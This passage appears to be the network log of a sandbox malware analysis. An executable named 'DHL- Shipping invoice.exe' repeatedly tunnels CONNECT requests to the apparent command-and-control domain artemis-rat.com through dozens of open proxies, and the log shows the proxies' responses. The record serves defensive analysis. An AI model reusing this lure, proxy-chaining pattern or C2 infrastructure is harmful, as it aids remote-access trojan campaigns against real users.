                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.683708906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.240242958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250467062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250193119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250380993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.250241041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.143309116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1981192.168.2.455606104.244.75.78315346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.169359922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1982192.168.2.454087121.204.179.7077776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.169946909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1983192.168.2.455246211.95.135.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.173005104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062606096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453176975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062660933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265649080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.552320004 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:22.683502913 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1984192.168.2.45544145.6.38.2480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.188797951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1985192.168.2.45559734.95.243.12280816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.192744970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1986192.168.2.455608195.138.73.54311456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.211249113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1987192.168.2.455604190.113.12.7533896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.218863964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1988192.168.2.45195851.75.126.150356326484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.233092070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1989192.168.2.451910193.106.57.9656786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.277048111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1990192.168.2.45558947.103.112.8688996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.277565002 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:08.773972034 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1991192.168.2.45418391.201.240.8456786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.278317928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1992192.168.2.453968117.160.250.16380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.278635979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.994046926 CET221INHTTP/1.1 403 Access Denied
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Connection: close
                            Cache-Control: no-store
                            Content-Type: text/html
                            Content-Language: en
                            Content-Length: 43
                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                            Data Ascii: You are not allowed to access the document.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1993192.168.2.451847185.232.69.73631676484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.279361963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.452927113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.508274078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.519716978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1994192.168.2.45560143.129.228.4678916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.299952030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1995192.168.2.45559843.155.153.244156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.299957991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1996192.168.2.45559943.155.165.196156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.300314903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1997192.168.2.455603123.57.236.13988996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.300316095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.602165937 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                            Mar 12, 2024 08:37:08.602214098 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1998192.168.2.455605203.218.172.22580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.312279940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1999192.168.2.45419995.111.227.164462956484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.312568903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.359400988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.453263044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.562833071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.562295914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.564960957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.562308073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.562491894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.562308073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2000192.168.2.451829181.78.94.1889996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.334393024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.395764112 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2001192.168.2.45560038.54.116.981186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.345292091 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2002192.168.2.455607120.76.42.20988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.345417976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.685153008 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.21.6
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2003192.168.2.455612116.199.170.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.370971918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2004192.168.2.454191162.214.225.223554316484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.374097109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.815819025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
